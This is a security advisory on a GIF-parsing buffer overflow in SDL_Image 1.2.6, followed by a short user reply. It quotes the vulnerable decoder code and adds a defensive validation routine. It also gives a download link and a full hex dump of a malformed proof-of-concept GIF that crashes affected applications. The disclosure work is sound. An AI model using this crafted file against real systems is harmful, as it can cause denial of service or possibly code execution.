SDL_Image is "an open source library providing image file handling functionality". Its GIF format handling routines suffer from a lack of proper buffer size validation, which makes them vulnerable to a buffer overflow attack. An attacker could DoS an application using SDL_Image, or execute arbitrary code (this has not been confirmed, and is believed to be nontrivial). Since this is a library, in some cases the attack could be remote.
Credit:
The information has been provided by Gynvael Coldwind.
Vulnerable Systems:
* SDL_Image version 1.2.6 and prior
Immune Systems:
* SDL_Image version 1.2.7
The problem occurs when a GIF file has an invalid LZW Minimum Code Size in the Table Based Image Data header. The standard allows codes to have a maximum size of 12 bits, but SDL_image does not check this. An attacker could use this for a local or remote buffer overflow attack that may result in denial of service or arbitrary code execution.
SDL_image file IMG_gif.c, function ReadImage:

    ...
    unsigned char c;    /* holds the LZW Minimum Code Size read from the file (read elided) */
    ...
    if (LWZReadByte(src, TRUE, c) < 0) {    /* 'c' is handed over unchecked */
        RWSetMsg("error reading image");
        return NULL;
    }
    /*
    ** If this is an "uninteresting picture" ignore it.
    */
    if (ignore) {
        while (LWZReadByte(src, FALSE, c) >= 0)
            ;
        return NULL;
    }
    ...

Please note that the value of 'c' is passed to LWZReadByte without checking that it is within the range the standard allows.
Then in function LWZReadByte:

    LWZReadByte(SDL_RWops *src, int flag, int input_code_size)
    ...
    static int table[2][(1 << MAX_LWZ_BITS)];    /* fixed size: 1 << 12 entries per row */
    ...
    set_code_size = input_code_size;             /* taken verbatim from the file */
    ...
    clear_code = 1 << set_code_size;             /* exceeds the table when set_code_size > MAX_LWZ_BITS */
    ...
    for (i = 0; i < clear_code; ++i) {           /* writes past the end of 'table' */
        table[0][i] = 0;
        table[1][i] = i;
    }
    ...

This is the first place that is affected by this issue.
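The following is an added example written for this advisory; it is not SDL_image code and not the 1.2.7 patch. It shows the defensive counterpart of the two places quoted above: a bounds-checked walk of a GIF up to its first Image Descriptor that reports the LZW Minimum Code Size byte and flags it when out of range, and a table set-up routine in the shape of LWZReadByte's that refuses such a value instead of indexing past the 1 << MAX_LWZ_BITS table. The accepted range 2..8 is my choice from the GIF89a specification (1-bit images are encoded with a code size of 2, pixel indices are at most 8 bits), which is tighter than the 12-bit ceiling the advisory cites. The function names, the error codes and the 1x1 sample GIF built by make_tiny_gif are all constructed for this example.

```c
/* Added example, not SDL_image code: validate the LZW Minimum Code Size
 * before any decoder table is sized from it. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_LWZ_BITS 12           /* same table limit the advisory quotes */
#define GIF_MIN_CODE_SIZE_MIN 2   /* GIF89a: 1-bit images still use code size 2 */
#define GIF_MIN_CODE_SIZE_MAX 8   /* pixel indices are at most 8 bits wide */

enum { GIF_OK = 0, GIF_ERR_SIGNATURE = -1, GIF_ERR_TRUNCATED = -2,
       GIF_ERR_NO_IMAGE = -3, GIF_ERR_BAD_CODE_SIZE = -4 };

static int table[2][1 << MAX_LWZ_BITS];   /* same shape as LWZReadByte's table */

int lzw_min_code_size_ok(int input_code_size)
{
    return input_code_size >= GIF_MIN_CODE_SIZE_MIN &&
           input_code_size <= GIF_MIN_CODE_SIZE_MAX;
}

/* Hardened counterpart of the table set-up quoted from LWZReadByte.
 * Returns clear_code, or -1 when the header value would index past 'table'. */
int lzw_init_table(int input_code_size)
{
    int set_code_size, clear_code, i;
    if (!lzw_min_code_size_ok(input_code_size))
        return -1;                       /* the range check that 1.2.6 lacks */
    set_code_size = input_code_size;
    clear_code = 1 << set_code_size;     /* at most 256 once validated */
    for (i = 0; i < clear_code; ++i) {
        table[0][i] = 0;
        table[1][i] = i;
    }
    return clear_code;
}

/* Walk an in-memory GIF to its first Image Descriptor and store that image's
 * LZW Minimum Code Size in *out. Every read is bounds-checked against len. */
int gif_first_lzw_min_code_size(const uint8_t *buf, size_t len, int *out)
{
    size_t pos = 13;                     /* header (6) + logical screen descriptor (7) */
    if (len < pos || (memcmp(buf, "GIF87a", 6) && memcmp(buf, "GIF89a", 6)))
        return GIF_ERR_SIGNATURE;
    if (buf[10] & 0x80)                  /* global colour table: 3 * 2^(N+1) bytes */
        pos += 3u * (2u << (buf[10] & 7));
    for (;;) {
        if (pos >= len) return GIF_ERR_TRUNCATED;
        switch (buf[pos++]) {
        case 0x21:                       /* extension: label byte, then data sub-blocks */
            pos++;
            for (;;) {
                if (pos >= len) return GIF_ERR_TRUNCATED;
                if (buf[pos] == 0) { pos++; break; }
                pos += 1u + buf[pos];
            }
            break;
        case 0x2C:                       /* image descriptor: 9 bytes, optional local table */
            if (pos + 9 > len) return GIF_ERR_TRUNCATED;
            if (buf[pos + 8] & 0x80)
                pos += 3u * (2u << (buf[pos + 8] & 7));
            pos += 9;
            if (pos >= len) return GIF_ERR_TRUNCATED;
            *out = buf[pos];             /* the byte ReadImage hands to LWZReadByte */
            return lzw_min_code_size_ok(*out) ? GIF_OK : GIF_ERR_BAD_CODE_SIZE;
        case 0x3B:                       /* trailer reached before any image */
            return GIF_ERR_NO_IMAGE;
        default:                         /* unknown block type: do not guess its length */
            return GIF_ERR_NO_IMAGE;
        }
    }
}

/* Constructed sample input: a 1x1 GIF whose first image carries the given
 * LZW Minimum Code Size. Not a file from the advisory. */
size_t make_tiny_gif(uint8_t *out, uint8_t min_code_size)
{
    static const uint8_t head[] = {
        'G','I','F','8','9','a', 1,0, 1,0, 0x80, 0, 0,  /* LSD with a 2-entry GCT */
        0,0,0, 255,255,255,                             /* global colour table */
        0x21, 0xF9, 4, 0,0,0,0, 0,                       /* graphic control extension */
        0x2C, 0,0, 0,0, 1,0, 1,0, 0 };                  /* image descriptor, no LCT */
    size_t n = sizeof head;
    memcpy(out, head, n);
    out[n++] = min_code_size;
    out[n++] = 1; out[n++] = 0x44; out[n++] = 0;        /* one data sub-block, terminator */
    out[n++] = 0x3B;                                    /* trailer */
    return n;
}

int demo_check(int min_code_size)        /* result of validating a sample with this value */
{
    uint8_t gif[64];
    int seen = -1;
    size_t n = make_tiny_gif(gif, (uint8_t)min_code_size);
    return gif_first_lzw_min_code_size(gif, n, &seen);
}

int demo_truncated(void)                 /* sample cut off right after the image descriptor */
{
    uint8_t gif[64];
    int seen = -1;
    size_t n = make_tiny_gif(gif, 2);
    return gif_first_lzw_min_code_size(gif, n - 5, &seen);
}

int main(void)
{
    printf("code size 2: %d, 21: %d, truncated: %d, table init(21): %d\n",
           demo_check(2), demo_check(21), demo_truncated(), lzw_init_table(21));
    return 0;
}
```

A loader that runs gif_first_lzw_min_code_size over an untrusted file before handing it to an affected decoder gets the same rejection the fixed decoder would give, and the walker itself never reads outside the buffer it was given, so a short or malformed file is reported as truncated rather than dereferenced.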
Proof of concept
DoS proof of concept GIF file:
http://vexillium.org/dl.php?sdlgifdos
0000000 4947 3846 6139 000a 000a 00f7 0000 0000
0000010 0080 0000 0080 8080 0000 8000 0080 0080
0000020 8080 8080 c080 c0c0 00ff 0000 00ff ffff
0000030 0000 ff00 00ff 00ff ffff ffff 00ff 0000
0000040 0000 0000 0000 0000 0000 0000 0000 0000
*
0000080 0000 0000 0000 0000 0000 0033 6600 0000
0000090 0099 cc00 0000 00ff 0033 3300 0033 6633
00000a0 3300 0099 cc33 3300 00ff 0066 6600 0033
00000b0 6666 6600 0099 cc66 6600 00ff 0099 9900
00000c0 0033 6699 9900 0099 cc99 9900 00ff 00cc
00000d0 cc00 0033 66cc cc00 0099 cccc cc00 00ff
00000e0 00ff ff00 0033 66ff ff00 0099 ccff ff00
00000f0 33ff 0000 0033 3333 6600 0033 3399 cc00
0000100 0033 33ff 0033 3333 3333 6633 3333 3399
0000110 cc33 3333 33ff 0066 6633 3333 6666 6633
0000120 3399 cc66 6633 33ff 0099 9933 3333 6699
0000130 9933 3399 cc99 9933 33ff 00cc cc33 3333
0000140 66cc cc33 3399 cccc cc33 33ff 00ff ff33
0000150 3333 66ff ff33 3399 ccff ff33 66ff 0000
0000160 0066 6633 6600 0066 6699 cc00 0066 66ff
0000170 0033 3366 6633 6633 3366 6699 cc33 3366
0000180 66ff 0066 6666 6633 6666 6666 6699 cc66
0000190 6666 66ff 0099 9966 6633 6699 9966 6699
00001a0 cc99 9966 66ff 00cc cc66 6633 66cc cc66
00001b0 6699 cccc cc66 66ff 00ff ff66 6633 66ff
00001c0 ff66 6699 ccff ff66 99ff 0000 0099 9933
00001d0 6600 0099 9999 cc00 0099 99ff 0033 3399
00001e0 9933 6633 3399 9999 cc33 3399 99ff 0066
00001f0 6699 9933 6666 6699 9999 cc66 6699 99ff
0000200 0099 9999 9933 6699 9999 9999 cc99 9999
0000210 99ff 00cc cc99 9933 66cc cc99 9999 cccc
0000220 cc99 99ff 00ff ff99 9933 66ff ff99 9999
0000230 ccff ff99 ccff 0000 00cc cc33 6600 00cc
0000240 cc99 cc00 00cc ccff 0033 33cc cc33 6633
0000250 33cc cc99 cc33 33cc ccff 0066 66cc cc33
0000260 6666 66cc cc99 cc66 66cc ccff 0099 99cc
0000270 cc33 6699 99cc cc99 cc99 99cc ccff 00cc
0000280 cccc cc33 66cc cccc cc99 cccc cccc ccff
0000290 00ff ffcc cc33 66ff ffcc cc99 ccff ffcc
00002a0 ffff 0000 00ff ff33 6600 00ff ff99 cc00
00002b0 00ff ffff 0033 33ff ff33 6633 33ff ff99
00002c0 cc33 33ff ffff 0066 66ff ff33 6666 66ff
00002d0 ff99 cc66 66ff ffff 0099 99ff ff33 6699
00002e0 99ff ff99 cc99 99ff ffff 00cc ccff ff33
00002f0 66cc ccff ff99 cccc ccff ffff 00ff ffff
0000300 ff33 66ff ffff ff99 ccff ffff 21ff 04f9
0000310 0001 1000 2c00 0000 0000 000a 000a 1500
0000320 0012 ff00 481c a0b0 83c1 1308 5c2a b0c8
0000330 c261 0080 003b
0000335
Subject: SDLimage-1.2.7, Where
Date: 12 Feb. 2008
From: jayjwahotmail.com

The last version I see released is 1.2.6, which is still vuln. by this description. SDL image's home page only goes to 1.2.6.